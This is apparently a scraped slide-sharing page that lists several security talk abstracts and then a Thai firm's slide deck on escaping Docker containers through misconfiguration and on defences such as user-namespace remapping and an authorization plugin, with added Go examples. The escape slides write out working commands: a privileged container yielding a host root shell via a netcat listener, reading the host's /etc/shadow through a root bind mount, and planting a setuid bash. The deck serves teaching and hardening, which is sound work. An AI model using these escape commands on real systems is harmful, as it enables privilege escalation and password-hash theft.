This session was presented at Global Microsoft 365 Developer Bootcamp, 2020, Hyderabad, India on 17 October, 2020.
Agenda:
- Manage User Identity
- Role Based Access Control (RBAC)
- Principle of least privilege
- Privileged Identity Management (PIM)
- Real world use cases
Docker and Podman are two close but different tools. What are their differences, what are their commonalities? In this presentation, we propose to present the two tools in order to highlight their differences in design and their specificities, their similarities.
The objective is to allow you to know these tools, from their common roots (Cgroup, namespace,...) to their divergence (socket). From ease of use (Socket) to the hassle (proxy), we will address the strengths and weaknesses of each through our uses of them (build, test,...). We will of course mention our friends the CVEs to feed your thoughts on their security.
DCEU 18: Tips and Tricks of the Docker Captains - Docker, Inc.
Brandon Mitchell - Solutions Architect, BoxBoat
Docker Captain Brandon Mitchell will help you accelerate your adoption of Docker containers by delivering tips and tricks on getting the most out of Docker. Topics include managing disk usage, preventing subnet collisions, debugging container networking, understanding image layers, getting more value out of the default volume driver, and solving the UID/GID permission issues with volumes in a way that allows images to be portable from any developer laptop and to production.
Container: is it safe enough to run your application? - Aleksey Zalesov
In this talk I explore technologies that empower containerisation and look at several cases when a container was able to break the walls around it. The talk was given at LinuxPiter on Nov 21, 2015.
Docker Practice for beginner.
- docker install on ubuntu 18.04 LTS
- docker pull/push
- making a docker-compose file which serves a spring-boot + MySQL application
Linux Security APIs and the Chromium Sandbox - Patricia Aas
The Linux Security and Isolation APIs have become the basis of some of the most useful features server-side, providing the isolation required for efficient containers. However, these APIs also form the basis of the Chromium Sandbox on Linux, and we will study them in that context.
The Chromium Sandbox is used in the Vivaldi, Brave, Chrome and Opera browsers among others. It has a very platform specific implementation, using the platform APIs available to construct it. In this talk we will describe the requirements of the Chromium Sandbox and go through the steps and APIs used to construct it on Linux.
Matt Batten (sleepZ3R0) spoke at BSIDES AUGUSTA and BSIDES RDU; these are our slides. Hope you can learn and benefit from them. If you have any questions, feel free to send us messages on Twitter; we will always respond.
Chromium Sandbox on Linux (BlackHoodie 2018) - Patricia Aas
The Linux Security and Isolation APIs have become the basis of some of the most useful features server-side, providing the isolation required for efficient containers. However, these APIs also form the basis of the Chromium Sandbox on Linux, and we will study them in that context in this talk.
The detailed architecture of the most relevant consumer drones will be introduced, continuing with the communications protocol between the pilot (app in the smartphone or remote controller) and the drone. Manual reverse engineering on the binary protocol used for this communication will lead to identifying and understanding all the commands from each of the drones, and later inject commands back.
Learning Objectives:
1: Understand whenever a protocol between drone and pilot is secure.
2: Learn about a new reverse engineering methodology for these protocols.
3: Review a set of good practices to secure the environment surrounding a drone.
(Source: RSA Conference USA 2018)
Chromium Sandbox on Linux (NDC Security 2019) - Patricia Aas
The Linux Security and Isolation APIs have become the basis of some of the most useful features server-side, providing the isolation required for efficient containers.
However, these APIs also form the basis of the Chromium Sandbox on Linux, and we will study them in that context in this talk.
Containers from Scratch: what are they made from? - Giri Kuncoro
Talk from Docker meetup Jakarta. Presented and demoed various Linux kernel features that enable container runtime, i.e. chroot, namespaces, cgroups, capabilities.
Topic: Art of Web Backdoor
Speaker: Pichaya Morimoto
Event: 2600 Thailand Meeting #5
Date: September 6, 2013
Video: https://www.youtube.com/watch?v=QIXTPPBfLyI
Securing your Kubernetes cluster: a step-by-step guide to success! - KatiaHIMEUR1
Today, after several years of existence, an extremely active community and an ultra-dynamic ecosystem, Kubernetes has established itself as the de facto standard in container orchestration. Thanks to a wide range of managed services, it has never been so easy to set up a ready-to-use Kubernetes cluster.
However, this ease of use means that the subject of security in Kubernetes is often left for later, or even neglected. This exposes companies to significant risks.
In this talk, I'll show you step-by-step how to secure your Kubernetes cluster for greater peace of mind and reliability.
9. บจก.สยามถนัดแฮก
Responsible / Version: Mr. Peeranat Thantaletong / 1.0 (2020-01-25)
Confidentiality class: Public
Escape Container via Security Misconfigurations
Misconfig 1: Running Container with --privileged
$ docker run --rm -it --privileged ubuntu bash
--privileged flag:
When using this flag, containers have full access to all devices and lack restrictions from seccomp, AppArmor, and Linux capabilities.
Misconfig 1: Running Container with --privileged
root@18ea7c42f8f2:/# sleep 2 && sh -c "echo $$ > /tmp/cgrp/x/cgroup.procs" &
root@18ea7c42f8f2:/# nc -lvp 9999
listening on [any] 9999 ...
172.17.0.1: inverse host lookup failed: Unknown host
connect to [172.17.0.2] from (UNKNOWN) [172.17.0.1] 33652
bash: cannot set terminal process group (-1): Inappropriate ioctl for device
bash: no job control in this shell
root@parrot:/#
Misconfig 2: Excessive Capabilities
$ docker run --rm -it --cap-add=SYS_ADMIN --security-opt apparmor=unconfined ubuntu bash
The --cap-add=SYS_ADMIN flag allows a container to perform the mount syscall.
Use the --security-opt apparmor=unconfined flag to start a container without an AppArmor profile.
*Docker starts containers with the docker-default AppArmor policy by default, which prevents the use of the mount syscall even when the container is run with SYS_ADMIN.
Misconfig 3: Mount Sensitive Volumes #1
dev01@parrot:~$ docker run -it -v /:/mnt/host --rm alpine sh
/ # cat /mnt/host/etc/shadow
root:$6$jvHBn8UTWequ.Rn5$TxgN48QEo7FEWgSvmgrmrXeTMULpmc6EOxSvh4pliCVwg4Vmd3ODpAz.ICbSz6L3P7RK0lDUP.IVSRckRU9Ss.:18040:0:99999:7:::
daemon:*:18011:0:99999:7:::
bin:*:18011:0:99999:7:::
[...]
Misconfig 3: Mount Sensitive Volumes #1
dev01@parrot:~$ docker run -it -v /:/mnt/host --rm alpine sh
/ # cp /mnt/host/bin/bash /mnt/host/tmp/bashsuid
/ # chmod a+sx /mnt/host/tmp/bashsuid
/ # exit
dev01@parrot:~$ /tmp/bashsuid -p
bashsuid-5.0# id
uid=1002(dev01) gid=1002(dev01) euid=0(root) egid=0(root) groups=0(root),997(docker),1002(dev01)
Low-Privileged Container
Image source: https://medium.com/@tonistiigi/experimenting-with-rootless-docker-416c9ad8c0d6
Enable User Namespaces
$ useradd -u 200000 temp-ns-root
$ groupmod -g 200000 temp-ns-root
$ useradd temp-ns
$ cat /etc/passwd | grep temp
temp-ns-root:x:200000:200000::/home/temp-ns-root:/bin/sh
temp-ns:x:1001:1001::/home/temp-ns:/bin/sh
Linux User Namespace
https://docs.docker.com/engine/security/userns-remap/
Enable User Namespaces
$ cat /etc/subuid
temp-ns:200000:65536
$ cat /etc/subgid
temp-ns:200000:65536
Linux User Namespace
Enable User Namespaces
$ cat /etc/docker/daemon.json
{
  "userns-remap": "temp-ns:temp-ns"
}
$ systemctl daemon-reload
$ systemctl restart docker
$ docker info
[...]
Security Options:
userns
Linux User Namespace
Linux User Namespace
$ docker run -it -v /:/mnt/host --rm alpine sh
/ # cat /proc/self/uid_map
0 200000 65536
/ # cat /proc/self/gid_map
0 200000 65536
/ # cat /mnt/host/etc/shadow
cat: can't open '/mnt/host/etc/shadow': Permission denied
/ # touch /mnt/host/tmp/remapped
/ # exit
$ ls -la /tmp/remapped
-rw-r--r-- 1 temp-ns-root temp-ns-root 0 Jan 23 08:42 /tmp/remapped
Linux User Namespace
$ docker run --rm -it --cap-add=SYS_ADMIN --security-opt apparmor=unconfined -v /usr/bin/nc:/usr/bin/nc ubuntu bash
root@d34335b93113:/# mkdir /tmp/cgrp
root@d34335b93113:/# mount -t cgroup -o rdma cgroup /tmp/cgrp
mount: /tmp/cgrp: permission denied.
Linux User Namespace
$ docker run -it --userns=host -v /:/mnt/host --rm alpine sh
/ # touch /mnt/host/tmp/remapped
/ # exit
$ ls -la /tmp/remapped
-rw-r--r-- 1 root root 0 Jan 23 08:53 /tmp/remapped
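The ID translation behind the user-namespace sessions above, as an added Go example that is not part of the original slides: it parses the uid_map line shown on the slide and checks whether root inside the namespace keeps its permission override on a host-owned file. The gid 42 used for /etc/shadow and the full-range map standing in for --userns=host are constructed sample values.

```go
package main

import (
	"bufio"
	"fmt"
	"strings"
)

// Extent is one line of /proc/<pid>/uid_map or gid_map:
// <first ID inside the namespace> <first ID on the host> <count>.
type Extent struct{ Inside, Host, Count uint64 }

// ParseIDMap parses the text of a uid_map or gid_map file.
func ParseIDMap(text string) ([]Extent, error) {
	var out []Extent
	sc := bufio.NewScanner(strings.NewReader(text))
	for sc.Scan() {
		line := strings.TrimSpace(sc.Text())
		if line == "" {
			continue
		}
		var e Extent
		if _, err := fmt.Sscan(line, &e.Inside, &e.Host, &e.Count); err != nil {
			return nil, fmt.Errorf("bad map line %q: %w", line, err)
		}
		out = append(out, e)
	}
	return out, sc.Err()
}

// ToHost translates an ID used inside the container to the host ID.
func ToHost(m []Extent, id uint64) (uint64, bool) {
	for _, e := range m {
		if id >= e.Inside && id-e.Inside < e.Count {
			return e.Host + (id - e.Inside), true
		}
	}
	return 0, false
}

// FromHost translates a host ID to the ID the container sees.
// Unmapped host IDs have no identity inside the namespace.
func FromHost(m []Extent, id uint64) (uint64, bool) {
	for _, e := range m {
		if id >= e.Host && id-e.Host < e.Count {
			return e.Inside + (id - e.Host), true
		}
	}
	return 0, false
}

// RootOverrides reports whether root inside the namespace may bypass the
// permission bits of a host file. The kernel honours CAP_DAC_OVERRIDE only
// when both the file's owner and its group are mapped into the namespace.
func RootOverrides(uidMap, gidMap []Extent, fileUID, fileGID uint64) bool {
	_, uidMapped := FromHost(uidMap, fileUID)
	_, gidMapped := FromHost(gidMap, fileGID)
	return uidMapped && gidMapped
}

func main() {
	remap, _ := ParseIDMap("0 200000 65536\n") // map from the slide
	host, _ := ParseIDMap("0 0 4294967295\n")  // constructed: identity map
	h, _ := ToHost(remap, 0)
	fmt.Println("container uid 0 writes files as host uid", h)
	// /etc/shadow: owner uid 0, group gid 42 (constructed sample value).
	fmt.Println("remapped root bypasses /etc/shadow mode:", RootOverrides(remap, remap, 0, 42))
	fmt.Println("--userns=host root bypasses /etc/shadow mode:", RootOverrides(host, host, 0, 42))
}
```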
Linux User Namespace
https://github.com/moby/moby/issues/22223
Docker Plugin - What is it?
In short, an OS process/service that extends capabilities of Docker Engine.
1. Authorization
- Extend API authorization mechanism
2. Network
- Extend network management - VXLAN, IPVLAN, MACVLAN, ...
3. Volume
- Extend persistent storage - Amazon EBS, ...
4. IPAM
- Extend IP address management - DNS, DHCP, ...
5. Graph
- Extend image and container fs storage
Docker Plugin API
A plugin registers with Docker by placing one of the following files in a plugin directory:
1. Unix Domain Socket
- /run/docker/plugins/demo.sock
2. URL
- /etc/docker/plugins/demo.spec, containing a URL such as unix:///other.sock or tcp://localhost:8080
3. JSON Specification
- /etc/docker/plugins/demo.json
Docker Plugin - Volume plugin for Amazon EBS
https://docs.docker.com/engine/extend/EBS_volume/
Docker Authorization Model (1 - Default)
Docker Authorization Model (2 - with AuthZ Plugin)
Image source: https://docs.docker.com/engine/extend/plugins_authorization/
Example with docker-no-trivial-root Plugin
https://github.com/ad-freiburg/docker-no-trivial-root
Disabling some trivial ways of gaining root via Docker
Just A Quick Look At The Code
https://github.com/ad-freiburg/docker-no-trivial-root
Docker Authorization Plugin
$ ./docker-no-trivial-root &
[1] 11552
$ ls -al /run/docker/plugins/
total 0
drwx------ 2 root root 60 Jan 24 05:13 .
drwx------ 8 root root 180 Jan 23 09:58 ..
srw-rw---- 1 root root 0 Jan 24 05:13 no-trivial-root.sock
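One way an authorization plugin can refuse the misconfigurations covered earlier (--privileged, SYS_ADMIN, an unconfined profile, --userns=host, sensitive bind mounts), as an added Go example that is not the docker-no-trivial-root code. It shows only the decision made on the daemon's AuthZ request for a container-create call; the deny-list of host paths and the API version in the sample request are assumptions.

```go
package main

import (
	"encoding/json"
	"fmt"
	"path"
	"regexp"
	"strings"
)

// AuthZRequest holds the fields of the daemon's AuthZ request used here;
// encoding/json decodes the base64 RequestBody into raw bytes.
type AuthZRequest struct {
	RequestMethod string
	RequestURI    string
	RequestBody   []byte
}

// AuthZResponse is the plugin's verdict; Msg is returned to the client on deny.
type AuthZResponse struct {
	Allow bool
	Msg   string
}

// createBody is the part of the container-create payload inspected below.
type createBody struct {
	HostConfig struct {
		Privileged  bool
		CapAdd      []string
		SecurityOpt []string
		UsernsMode  string
		Binds       []string
	}
}

var createURI = regexp.MustCompile(`^(/v[0-9.]+)?/containers/create(\?.*)?$`)

// blockedSources is an assumed deny-list of host paths (example policy).
var blockedSources = map[string]bool{"/": true, "/etc": true, "/var/run/docker.sock": true}

func deny(msg string) AuthZResponse { return AuthZResponse{Allow: false, Msg: msg} }

// Decide denies container-create calls that carry the misconfigurations
// shown in the slides and allows every other API call.
func Decide(req AuthZRequest) AuthZResponse {
	if req.RequestMethod != "POST" || !createURI.MatchString(req.RequestURI) {
		return AuthZResponse{Allow: true}
	}
	var body createBody
	if err := json.Unmarshal(req.RequestBody, &body); err != nil {
		return deny("cannot parse create request") // fail closed
	}
	hc := body.HostConfig
	if hc.Privileged {
		return deny("privileged containers are not allowed")
	}
	for _, c := range hc.CapAdd {
		if n := strings.TrimPrefix(strings.ToUpper(c), "CAP_"); n == "SYS_ADMIN" || n == "ALL" {
			return deny("capability not allowed: " + c)
		}
	}
	for _, o := range hc.SecurityOpt {
		if strings.HasSuffix(o, "=unconfined") || strings.HasSuffix(o, ":unconfined") {
			return deny("security profile disabled: " + o)
		}
	}
	if hc.UsernsMode == "host" {
		return deny("--userns=host is not allowed")
	}
	for _, b := range hc.Binds { // "source:target[:options]"
		src := strings.SplitN(b, ":", 2)[0]
		if strings.HasPrefix(src, "/") && blockedSources[path.Clean(src)] {
			return deny("bind mount of " + src + " is not allowed")
		}
	}
	return AuthZResponse{Allow: true}
}

func main() {
	// Constructed create request equivalent to `docker run --privileged ubuntu`.
	req := AuthZRequest{RequestMethod: "POST", RequestURI: "/v1.40/containers/create",
		RequestBody: []byte(`{"Image":"ubuntu","HostConfig":{"Privileged":true}}`)}
	fmt.Printf("%+v\n", Decide(req))
}
```

A policy used in production would also have to inspect HostConfig.Mounts and the other API endpoints that can start or reconfigure containers.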